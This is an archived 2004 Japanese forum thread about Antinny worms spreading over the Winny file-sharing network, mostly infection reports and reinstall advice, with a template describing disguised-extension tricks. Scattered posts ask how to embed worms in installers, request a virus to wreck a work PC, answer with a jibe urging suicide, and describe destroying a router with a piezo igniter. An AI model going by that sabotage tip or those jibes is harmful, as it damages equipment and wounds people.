【警報】Winnyを狙ったワーム・ウイルス情報 Part26

[表示 : 全て最新50 1-99 101- 201- 301- 401- 501- 601- 701- 801- 901- 1001- 2chのread.cgiへ]
Update time : 07/06 07:03 / Filesize : 237 KB / Number-of Response : 1002
[このスレッドの書き込みを削除する]
[＋板最近立ったスレ＆熱いスレ一覧 : ＋板最近立ったスレ／記者別一覧] [類似スレッド一覧]


↑キャッシュ検索、類似スレ動作を修正しました、ご迷惑をお掛けしました

1 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/11 12:10:15 ID:j8DDPfNG]: Winnyで流れているワーム、ウイルス等の報告・調査・対処をするスレです。
質問はテンプレを読んでからにして下さい。
読まずに質問しても「テンプレ嫁」と切り返されるだけです。
余裕があれば過去ログにも目を通してください。
なお、ここは初心者の質問スレではありません。

■流行種
・元祖Antinny系　・キンタマ系　・batファイル　・スクリーンセーバー　etc

■流行感染パターン
・exeの前にスペースたくさん（例：「秘密の写真.jpg　　　　　　　　　.exe」等）
・拡張子が.folderに変更されたHTMLからexeを実行させる
・autorunからbatファイルを実行させる
・スタートアップに解凍させ、再起動後exeを実行させる

■DL後のちょっとした注意
・落としたファイルは必ずウイルススキャンする
・exeファイルはうかつに実行しない
・ファイルのアイコンが偽装されてないか確認する

■全ての感染者に共通の、絶対確実な対処方法
ハードディスクをフォーマットした上で、Windowsの再インストールをする。
上書きインストールではダメです。
現在ハードディスクにあるデータは消えるので、待避するなり諦めるなりしてください。

前スレ
【警報】Winnyを狙ったワーム・ウイルス情報 Part25
tmp4.2ch.net/test/read.cgi/download/1093270545/l50

ﾃﾝﾌﾟﾚまとめ　www.geocities.jp/kemkzuenc/Antinny.html
Antinny対策サイト ttp://nyweb.hp.infoseek.co.jp/
125 名前：a mailto:sage [04/09/14 10:39:04 ID:+9UvRGr5]: Antiny.Jって今流行の解凍ウイルス？
バスターで圧縮ファイルを検索したら出てきた。
駆除できなかったので、隔離後、削除。
126 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/14 11:14:21 ID:iR8YFg4M]: >>125
解凍ウイルスって？
127 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/14 11:16:55 ID:rvJu59Kv]: >>125
違う
128 名前：[名無し]さん(bin+cue).rar [04/09/14 16:49:00 ID:dnonFg0K]: >>126
ヌルポーズ
129 名前：[名無し]さん(bin+cue).rar [04/09/14 18:57:39 ID:tYxEtQzz]: 0b9bc90f088ecef9f2b098f800a8803d
130 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/14 19:18:19 ID:FKmxUeBW]: 怪盗ウイルス参上！
　　　　　⌒*＿＿_*⌒
　　　　　～|・∀・|～
　　　　　　|＿＿|
　　　　　　　　乂
131 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/14 19:38:00 ID:N6TJZSqQ]: >>125
あ、それ俺が提出した検体かもorz
132 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/14 20:43:10 ID:IULF+3jC]: ttp://www.trendmicro.co.jp/vinfo/default.asp?sect=TT

今更ながらAがNO.1獲得してます
133 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/14 20:49:12 ID:Vh0ZBmTI]: 1. HTML_NETSKY.P
と表示される・・・
134 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/14 21:16:31 ID:YPv2hXKz]: 1. HTML_NETSKY.P

2. WORM_ANTINNY.A

3. WORM_NETSKY.Q

4. PE_PARITE.A

5. WORM_NETSKY.P

6. WORM_ANTINNY.G

7. WORM_NETSKY.D

8. JAVA_BYTEVER.A

9. WORM_ANTINNY.J

10. HTML_REDIR.A
135 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/14 21:31:31 ID:Ha8OhRhP]: デスクトップにタフガイが出てきます！助けてください！
136 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/14 21:32:21 ID:mygke+An]: 時々刻々と変わるみたいだね
1. WORM_ANTINNY.A
2. HTML_NETSKY.P
3. PE_PARITE.A
4. WORM_NETSKY.Q
5. WORM_NETSKY.P
6. WORM_ANTINNY.G
7. WORM_NETSKY.D
8. JAVA_BYTEVER.A
9. WORM_ANTINNY.J
10. HTML_REDIR.A

しかし、NetSkyを超えてるってのと、上位10位にAntinnyが3つも...これはすごいことですなぁ
日本のみのデータとはいえ。アジアでは9位、他地域では圏外
137 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/14 21:44:53 ID:11Swtpb8]: それってオンラインスキャンの結果ランキングじゃなかったっけ？
実際感染者も多いんだろうが、ny使いがオンラインスキャンする率も高いんだろう
他のワームだと感染してる自覚がなかったりするから
138 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/14 21:57:24 ID:ZjY3/3On]: バスター最新パターンｷﾀ━━━(ﾟ∀ﾟ)━━━!!!!
パターン 2.172.00
リリース日： 2004/9/14 （日本時間）

で、WORM_ANTINNY.DAMって何？
139 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/14 22:03:27 ID:IULF+3jC]: <B style="color:black;background-color:#ffff66">WORM_ANTINNY.DAM</B>
140 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/14 22:05:36 ID:GDAbphE+]: 先生はまだかな…
141 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/14 22:06:12 ID:IULF+3jC]: 英語サイトだと取消線入ってるけど何でだろ？
142 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/14 23:00:24 ID:ZjY3/3On]: >>137
それでも泣きついてくる香具師がいないのは、結構自分でなんとか駆除してるんかねぇ？
143 名前：[名無し]さん(bin+cue).rar [04/09/15 00:46:58 ID:ZmGfkIX3]: すいません。Antinny．Aに感染してるんですが、こういう場合って
システムの復元をやっても意味ないんですか？
144 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/15 00:54:34 ID:VTF6zJ8z]: >>143
意味ない。さっさとクリーンインスコしろや

お前が被害にあうだけでなく、迷惑振りまいてることを忘れるな。
145 名前：[名無し]さん(bin+cue).rar [04/09/15 01:16:09 ID:/3rakzi7]: Antinnyとやらに感染してしまったんですが
漏れの力量では、駆除できないのよ
こんなﾊﾞﾔｲどうしたらよいのでしょうか？
146 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/15 01:18:40 ID:hMbkKpFB]: 再インスコ
147 名前：145 [04/09/15 01:28:17 ID:/3rakzi7]: 再インスコとは？
148 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/15 01:30:45 ID:Mnl7ykMg]: >>147
再インスコもわからないのにnyやるとは・・・勇気あるな。
149 名前：初心者 mailto:sage [04/09/15 01:32:57 ID:TKTUdj76]: W32.Antinny.Q をノートン先生が駆除したのですが
ウィルス入りファイルのキャッシュも削除したいのですが如何やって見分けるのですか？

適当に同じくらいのサイズのキャッシュを消すか
150 名前：[名無し]さん(bin+cue).rar [04/09/15 01:45:16 ID:EqTci4AO]: 新しいバージョン…の表示が出たけど
７．１なのに今さら…？
151 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/15 01:48:07 ID:Q9no2stk]: >>150
(´ω｀*) Winny総合質問21 (*´ω｀)
tmp4.2ch.net/test/read.cgi/download/1094999752/

お勉強してからnyつかいな
152 名前：147 [04/09/15 01:49:35 ID:/3rakzi7]: >>148
なにぶん当方ＰＣ暦１ヶ月なもので
で、再インスコとはどのような作業を示すの？
153 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/15 01:51:42 ID:kG0AbLLN]: OSの再インストールだってば！もうｎｙはやめなさい。て言うかやめて下さい。
154 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/15 01:55:31 ID:Mnl7ykMg]: 次は再インスコの仕方を聞いてくるに1500銭
155 名前：147 [04/09/15 01:56:23 ID:/3rakzi7]: >>153
はい
156 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/15 02:49:34 ID:MyQkjLBg]: >>147
最インスコの前にsageを覚えれ
157 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/15 03:25:18 ID:oU9xo6cO]: はっ！それだ。
俺の提出した検体が電話でAntiny.DAMに認定されましたとか逝ってたな
158 名前：175=131 mailto:sage [04/09/15 03:31:12 ID:oU9xo6cO]: 名前欄書き忘れ_|￣|○
159 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/15 03:32:18 ID:P01Nf6vC]: しかしPC歴1ヶ月でnyやってAntinny喰らって2chで板違いの上にsageずに質問か

ある意味ツワモノだなｗ
まぁ夏厨の残り香だろーけど
160 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/15 03:32:56 ID:TKTUdj76]: 質問です。

CDイメージファイルをデーモンでマウントしようとして（自動起動は切ってある）フォルダを開いたとたんにDOS画面になって真っ暗になったと思ったら、普通のマウント画面に戻り
その後マウント、中身をウィルス検索、ウィルス発見、削除したのですが、
イメージファイルが入っているフォルダを開いただけで、実行もしてないのに発動する事があるんでしょうか？

その後全ドライブ検索してもそれらしいウィルスは発見されないのですが・・・
それとも、フォルダを開くときに、反応が鈍くてイライラし、適当に何度もクリックしてしまったのが
原因でなにか別のアプリを起動しちゃっただけなのかな？
161 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/15 05:15:09 ID:tjJdJJDO]: なんか釣り師ばっかだな。
162 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/15 08:04:16 ID:1rbO6aBO]: >>149
キャッシュ表示ツールでも何でも使ったらいい

ああ、釣りですか。そうですか
163 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/15 09:29:09 ID:kzs2MeKW]: Antinny.orz
164 名前：[名無し]さん(bin+cue).rar [04/09/15 09:34:02 ID:UJrg2gvj]: Antinny.ω
165 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/15 09:41:09 ID:gNWm1hEk]: >>160
フォルダが偽装されていて実行モジュールだったんじゃないの？
166 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/15 11:27:39 ID:TKTUdj76]: >>161
いや、マジでｎｙはじめて間もないもんで・・・
でも、なんかガンガンウィルス来るし。

>>162
そうか、ツール系全然調べて無かったわ､アホだ
スマソ

>>165
でも、その前に普通に開いた時は大丈夫だったんですよね。
デーモンで開いたからかな？
167 名前：[名無し]さん(bin+cue).rar [04/09/15 11:34:38 ID:net0IVc9]: 166 名前：[名無し]さん(bin+cue).rar[sage] 投稿日：04/09/15 11:27:39 ID:TKTUdj76
>>161
いや、マジでｎｙはじめて間もないもんで・・・
でも、なんかガンガンウィルス来るし。
168 名前：[名無し]さん(bin+cue).rar [04/09/15 11:40:23 ID:8KSWkhcc]: 魚のいない釣堀だな
169 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/15 11:50:49 ID:P01Nf6vC]: ageんなよ、おめーら
170 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/15 13:00:00 ID:ajLDSGbL]: >>129
> 0b9bc90f088ecef9f2b098f800a8803d

これ落としてみたけどVB（オンライン）は反応しないね。
AVGは未知のウイルスってことで実行前には必ず反応する。
拡張子の前に空白があるから反応してるっぽいので削ってみたけど実行できないのでやばいんだろうね。
（空白削ったら拡張子はEXEなのにフォルダアイコンになってる…　　W2Kなんだけどな…）
171 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/15 14:38:03 ID:BYwTHcND]: >>166
テンプレを熟読実行、理解できないなら初心者スレにいく。
もしくはやめる。
172 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/15 16:01:48 ID:pM0AceH0]: >>171
了解、大体わかりました。
自己解決　

流し読みはしたのですが、スマソ。
173 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/15 16:38:54 ID:5SNiomkt]: jpeg見ただけでexeを実行させられるらしいぞ
対策パッチいれれ

itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040915/149928/
174 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/15 16:41:29 ID:dkQvTrUA]: >>173
対策パッチ自体がなんかトロイのような技術使ってるのには萎えた。
さすがMS。
175 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/15 16:45:05 ID:9vLjGktC]: >>173
あー俺それにかかったかも
176 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/15 16:49:11 ID:guMLKIPk]: やっぱり2kとﾈｽｹだな
177 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/15 18:08:06 ID:jbPLIK2H]: 一月くらいまえからAntinny.Lってのに感染してしまったんだが、
なんとかなんないっすか？これといった目に見える被害はないようだが。
178 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/15 18:37:17 ID:kClNGeRG]: >>177
レッツ再インスコ（・Ａ・）よく嫁!!
デスクトップ画像などを漏洩させる、Antinnyの最新亜種「Antinny.L」
internet.watch.impress.co.jp/cda/news/2004/05/26/3246.html
179 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/16 03:14:29 ID:UN2fD7DN]: デスクトップにフォルダ置いて置かなければ、亜種じゃないキンタマに感染しても
流れるのはデスクトップの画像とユーザー名だけ？
それならユーザー名を実名にしとかなければ問題ないのかな？
180 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/16 04:00:52 ID:IoMPofav]: >>179
>>178 記事を読んでみ
181 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/16 09:50:11 ID:wK/1//8x]: Antinny.Aに感染し、検出されたウイルス入りファイルを削除したところ、
スキャンしてもウイルスが検出されなくなりました。

>>102で張られてるリンク先の症状も見当たらないし、
ｎｙのフォルダにうｐフォルダとかも見当たらないし、
これで駆除できたってことで大丈夫ですかね？？
ご教授お願いします。
182 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/16 10:03:36 ID:0dEsX0Tg]: >>181
100%Antinny.Aだ！言えるならそれでおｋ
ただ亜種だったりした場合はシラネ
本人の自由だし、俺はｎｙウイルス感染した時点で
再インスコ絶対するけどな
183 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/16 10:21:06 ID:wK/1//8x]: >>182
AVGでスキャンしてるんですが、Antinny.Aと判断されていても
Antinny.Aじゃないってこともあるんでしょうか？
180で書いたような症状は感染してから1度も起こっていないので、
本当にAntinny.Aなのかいまいち自信がありません。
184 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/16 12:03:19 ID:1UsxEmo4]: >>183
Heuristic scanで似たようなのを拾ってる可能性はあるけれど、亜種が
ひっかかるのかはなんとも言えない。

正直、>>182が言ってくれてるように初期化リカバリーするのが大吉。
185 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/16 12:11:02 ID:owhsy+z3]: >>173サマ

ありが㌧！(*^ｰ^*)
186 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/16 18:58:35 ID:uww4rieL]: exeをクリックしたら、下のように壁紙が変わっちまったよ・・・
wp.aimoudo.net/picbbs02/masa202/img/129.jpg
187 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/16 19:07:09 ID:P/2w4DTW]: >>186
グロ注意！
188 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/16 19:39:32 ID:fAoNFX1/]: ちょっと聞きたいんだが、
shareにもantinyみたいなのってあるの？
今日最新のver(A55)解凍してverupしたら
カタログに、その解凍先フォルダが登録されてた。
2.3日まえから脳豚のupdateもできないし、
ひょっとしてふんじゃった？
nyで検索しても自分のﾌｧｲﾙないっぽいし･･･。

一応落としたﾌｧｲﾙは脳豚&etrustでﾁｪｯｸはしてる、･･･はず。
189 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/16 20:45:29 ID:HcElDh11]: >>186
これ・・・入るのか？
190 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/16 20:51:03 ID:WXlcGZ+z]: そういや壁紙がエロゲのCGになって変更できなくなる、っつーのもあったな。
191 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/16 20:55:04 ID:WYUKMOl2]: >>188
それはwinny/shareワームにも対応してイナイ、イクナイノートン先生だか
らです。最新版の脳豚インターネットセキュリティなら安心！ 10/15発売。
さらに、今回のバージョンから釣りに対応。これで「お前はまた騙されたわ
けだが」のスレをクリックしても大丈夫です。
(一部脳内妄想が混じってます)

今回のバージョンからプロダクトアクティベーションが採用されます/本当( ;ﾟДﾟ)
24桁もあってゲンナリ
192 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/16 20:57:50 ID:BUSp181Z]: 壁紙、蓮コラもある。
193 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/16 23:07:05 ID:pej4hnR7]: 踏んじゃった
どうやら初期のようですぐ削除できたっぽいけど
なんかキモイ顔写真やらダウンロードしたファイルが流れそうになっただけで大丈夫っぽい
194 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/17 00:58:40 ID:7Ru9jBeZ]: >>193
ぬるぽ？
キンタマ？
195 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/17 01:08:27 ID:FqGBcRna]: >>194
ｶﾞｯ
196 名前：[名無し]さん(bin+cue).rar [04/09/17 17:42:52 ID:L8CabldY]: >>186

のグロ絵ってどんな絵
教えて、先生。
197 名前：[名無し]さん(bin+cue).rar [04/09/17 17:57:25 ID:UiTGH72N]: よろしく！IMチョーダイ553_12526
とは交換しない方がいい
198 名前：[名無し]さん(bin+cue).rar [04/09/17 18:12:39 ID:Jkdwb/Vn]: >>197
（ ´_ゝ｀）ﾌｰﾝ、、、
199 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/17 18:47:34 ID:ZaBsaSfe]: アンチウイルスソフトでスキャン
オンラインスキャン
極窓で拡張子判別
圧縮ファイルは解凍前に中身を確認

落としたファイルをクリックする前にこれのほかにしといたほうがいいことありますか？
200 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/17 19:01:46 ID:HveayeTh]: >>199 正攻法ならSSMの導入　delexeの導入
　　　　絡めていくならny専用機でやるとか
201 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/17 19:11:33 ID:kHnzWPzJ]: >>196

デブバラの祖チンから汚汁の図
202 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/17 19:29:52 ID:0UzWlmcU]: みんな更新日時とか見てる？圧縮された中身の
更新日時がヌルポースとかが出る前だったら
ノートンで何とかなるだろとか思うときがあるんだけど。
意味ないかな？
203 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/17 19:39:45 ID:XDnVXp6k]: >>202
更新日時など、いくらでも簡単に変更できる。
意味ないべ。
204 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/17 19:59:22 ID:t31qD9kK]: Antinny.Jを検出したのですが、VBが処理できないみたいなんです
どうすればいいですかね？
205 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/17 20:01:50 ID:0UzWlmcU]: >>203
マジでか？
まぁウィルス踏んだことはまだないから
これから気をつけます。
206 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/17 20:08:35 ID:8KPpvB9p]: >>204
VBが処理できないって、具体的にどういうメッセージがでたんだ？
207 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/17 20:09:45 ID:t31qD9kK]: >>206
そのまま「ウィルスを処理できません」と出ました
最新版にアップデートはしてあります
208 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/17 20:16:32 ID:8KPpvB9p]: >>207
ウイルスログにはなんて出てる？
209 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/17 20:17:48 ID:7Ru9jBeZ]: >>207
感染しちゃったら
とりあえず
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_ANTINNY.J

ダメなら・・・
210 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/17 20:27:25 ID:t31qD9kK]: ダメ元で、ウィルスが入ってたであろうフォルダを削除して
もう一度検索したら、検出されなくなりました
もしダメだったら再インスコしてみますね　失礼しました
211 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/17 21:50:52 ID:3lnlo8zt]: >>200
横レスすみません
こちらで皆さまの博識をお頼りしてるのですが
SSMとdelexeがわかりません・・・(;´д⊂ヽ
よろしければ教えていただけないでしょうか
212 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/17 21:54:24 ID:uqJP2qR2]: >>211
www.geocities.co.jp/Outdoors-Mountain/9671/ssm/
a-t-software.hp.infoseek.co.jp/apps/delexe/
213 名前：211 mailto:sage [04/09/17 22:07:58 ID:3lnlo8zt]: >>212様
速レス＆リンクありがとうございました
すごく助かりました！感謝いたしますです<(_ _)>ぺこり
214 名前：[名無し]さん(bin+cue).rar [04/09/18 00:21:41 ID:etfW40cx]: キンタマ感染していも、実際個人データが流失しない人と、実際流れてしまう人の違いはなに？
ポト０とそうじゃない人の違いかな・・・・。
215 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/18 00:22:58 ID:Nip6NdZR]: あげんなよそんなことで。
感染したことに気づくかどうかだろ。
216 名前：214+ [04/09/18 00:24:50 ID:etfW40cx]: いや、これはとても重要なことなので上げる
217 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/18 00:27:30 ID:qF+5z9DN]: >>214
俺の場合ｎｙ1の環境を残したまま、ny2を使ってたが、
ny1の方に流出ﾄﾗｯﾌﾟ仕掛けられてた。
よって、感染はしたが個人情報流出はしなかった。
218 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/18 00:32:13 ID:ftgx9+dl]: >>216
お前にとって重要でも
お前以外の奴には重要でも何でも無いことだ
いちいちあげんな
219 名前：214+ [04/09/18 00:45:43 ID:etfW40cx]: いや、お前にとって重要で無いなら、いちいち絡んでくるな。214+を無視リストでも入れとけ
これはとても重要なことなのだ。
220 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/18 00:48:41 ID:Nip6NdZR]: しばらくスルーで行きましょ。みなさま
221 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/18 00:49:54 ID:canoSZ1e]: 頭のイタイやつがでてきたな・・・・
222 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/18 00:53:40 ID:gYO8D+ez]: 普通にsageとけば答えてくれたかもしれない人を敵に回す行為
sage推奨スレでは逆効果だわな
223 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/18 00:54:57 ID:+1P/CFMW]: やっぱし、TVや雑誌の影響かね・・・
224 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/18 00:55:31 ID:qF+5z9DN]: ﾏｼﾞﾚｽしてしまったことを、後悔∧∥∧
225 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/18 00:56:49 ID:canoSZ1e]: 夏は終わったと思ってたんだがな・・・・・
226 名前：[名無し]さん(bin+cue).rar [04/09/18 01:03:02 ID:vxklo668]: WinnyやMXやらShareに流れてるファイルに
ワームを混入させたいんですが、
どうやって既存のインストールプログラムに
サブルーチンコールを付与すべきでしょうか？

デバッガを使って無理矢理混入したウィルスタイプのライブラリに
途中分岐でリンクさせたけど
うまくメインルーチンにアドレスが返されませんでした。
227 名前：[名無し]さん(bin+cue).rar [04/09/18 01:05:26 ID:jyczkZa1]: チンコがどうしたって？
228 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/18 01:08:15 ID:canoSZ1e]: さらに頭のイタイやつが現れたな・・・・もう寝よう。
229 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/18 01:10:05 ID:ftgx9+dl]: >>227のチンコには負けましたって事らしいよ。やったな>>227
230 名前：[名無し]さん(bin+cue).rar [04/09/18 01:12:39 ID:hGSRUg2U]: 上げときますね。
231 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/18 01:28:29 ID:dM+zp+57]: ageんな糞ヴォケ滓
232 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/18 01:28:59 ID:TCVIzHRJ]: なんだかいつのまにか
身に覚えのない物がｳﾌﾟされてた
いろいろ調べていると、ユーザー名のtxtがあったんで
開いてみると「おっす、おらユーザー名（ｒｙ
ってなのがでてきた
あ～これがタマキンか～
233 名前：[名無し]さん(bin+cue).rar [04/09/18 01:36:19 ID:dQoN/UbI]: >>232
オメｗ
234 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/18 02:10:04 ID:TCVIzHRJ]: >>233
どもｗ
235 名前：[名無し]さん(bin+cue).rar [04/09/18 02:48:31 ID:qlqpSio4]: 会社のＰＣぶっこわしたい
ウイルスください
236 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/18 02:49:53 ID:hzPBJ0QF]: >>235
ウイルスなんか入れるより、会社で首つった方が効果あるよ。
237 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/18 03:03:37 ID:aokByHeF]: itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040917/150103/
これの強烈な奴を雑誌に忍ばせて流してください
238 名前：[名無し]さん(bin+cue).rar [04/09/18 03:05:06 ID:xTYBz+Io]: >>236
それはもう試した
スルーされた
239 名前：[名無し]さん(bin+cue).rar [04/09/18 05:32:19 ID:y+faMCzy]: >>238
キンタマ晒しながらLANケーブルで実行しないからだよ。
ノートン先生に黙って削除されたんだろ。

破壊するのは意外と簡単で、100円ライターとかの着火装置（圧電素子）
をLANケーブルに直結して、数回バチバチやるといい。ルータが死ぬ。
240 名前：[名無し]さん(bin+cue).rar [04/09/18 05:42:31 ID:5B8C5U3I]: openuser7.auctions.yahoo.co.jp/jp/user/torajirou3391?
★DVD6枚★同人誌5100冊以上＋HCG15.000枚＋エッチ動画☆送料込!

▼悲惨な落札者一覧（無論個人データは販売されます）▼
rating7.auctions.yahoo.co.jp/jp/show/rating?userID=rei_asuka_saiko
rating3.auctions.yahoo.co.jp/jp/show/rating?userID=xz9994abx&
rating7.auctions.yahoo.co.jp/jp/show/rating?userID=kazutake32001&
rating9.auctions.yahoo.co.jp/jp/show/rating?userID=lexsusys&
rating10.auctions.yahoo.co.jp/jp/show/rating?userID=ryota52045204&
rating10.auctions.yahoo.co.jp/jp/show/rating?userID=swallow53jp
rating10.auctions.yahoo.co.jp/jp/show/rating?userID=beru0710&
rating6.auctions.yahoo.co.jp/jp/show/rating?userID=kanon_one_air2000&
rating9.auctions.yahoo.co.jp/jp/show/rating?userID=dwwjq768&
rating4.auctions.yahoo.co.jp/jp/show/rating?userID=naitou1253&
241 名前：[名無し]さん(bin+cue).rar [04/09/18 06:13:30 ID:R7QYZmDs]: 上げときますね。
242 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/18 12:24:58 ID:bfHqPWcI]: アップフォルダないのに
「アップフォルダ個数」が１になってる……。
これいかに？
243 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/18 12:27:30 ID:TgLPYUrm]: >>242
BBSフォルダの分
244 名前：242 mailto:sage [04/09/18 12:32:14 ID:bfHqPWcI]: そっか。今までもそうだったのに気づかなかっただけか。ｽﾏｿ
245 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/18 12:48:05 ID:irPYa9lh]: （・∀・）
246 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/18 13:07:42 ID:hokjhQog]: >>242
（・∀・）ｺﾝﾆﾁﾊ!!
247 名前：[名無し]さん(bin+cue).rar [04/09/18 13:19:29 ID:1ZkQdLkq]: （・∀・）
248 名前：242 mailto:sage [04/09/18 13:21:08 ID:bfHqPWcI]: こんにちは。でももう出かけないと。
バイバイ
249 名前：[名無し]さん(bin+cue).rar [04/09/18 13:55:20 ID:TPrHK7Go]: ゲーム等のマウントは、Autorunを切っておけばウィルスの危険性は無いですか？
250 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/18 14:17:55 ID:Nip6NdZR]: etfW40cxのおかげで一晩にして超糞スレに・・・
251 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/18 14:34:02 ID:BjPWCEhd]: >>249
マウントするだけでインスコしないんなら大丈夫でないの？
252 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/18 14:42:07 ID:APQAO7oD]: >>250
奴は友達が一人もいないかわいそうなマザコンなんだよ
253 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/18 14:43:44 ID:mt3AgFOP]: いつも不思議なんだが。
autorun が bat とかでスグわかるなら別だが、
exe の場合はリスクがありすぎだろ。

setup.exe を実行するわけだろ。
ワクチンソフトも効かないような可能性がでかいし。

エロの欲望は autorun なんか切っても無駄無駄無駄
254 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/18 14:52:30 ID:Yo5MmgB8]: なんか*.mbx、NNdbase.txt,、attachというフォルダ、等がはいったファイルを拾ってしまった。
丸見えだし。滋賀県立大の中の人だね。

ウイルス本体が入ってないから何に感染したのかわからんが。
おそろしい…
255 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/18 15:24:51 ID:aokByHeF]: www.itmedia.co.jp/enterprise/articles/0409/18/news004.html
雑誌にこれを入れてください
256 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/18 15:37:54 ID:yeAqUCJ4]: セキュリティ更新プログラムを？
257 名前：[名無し]さん(bin+cue).rar [04/09/18 18:31:52 ID:61j5ADx5]: itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040917/150103/
これの強烈な奴を雑誌に忍ばせて流してください
258 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/18 18:51:59 ID:w9ErVn4c]: 元々の糞レスばかりの厨房スレ
が一段と糞化してるなｗ

くせー
259 名前：[名無し]さん(bin+cue).rar [04/09/18 19:15:19 ID:cC1rHeRO]: >>218
>>231
漏れら極悪非道のageブラザーズ！
今日もネタもないのにageてやるからな！
￣￣∨￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣
　 ∧＿∧ 　 ∧＿∧ 　　　age
　（・∀・∩）（∩・∀・）　　　　age
　（つ　　丿（　　⊂）　age
　（　ヽノ　　ヽ/　　）　　　age
　し（＿）　　（＿）Ｊ
260 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/18 20:25:55 ID:8nTqDf49]: 漏れら極悪非道のなんだとブラザーズ！
今日もネタもないのにビームしてやるからな！
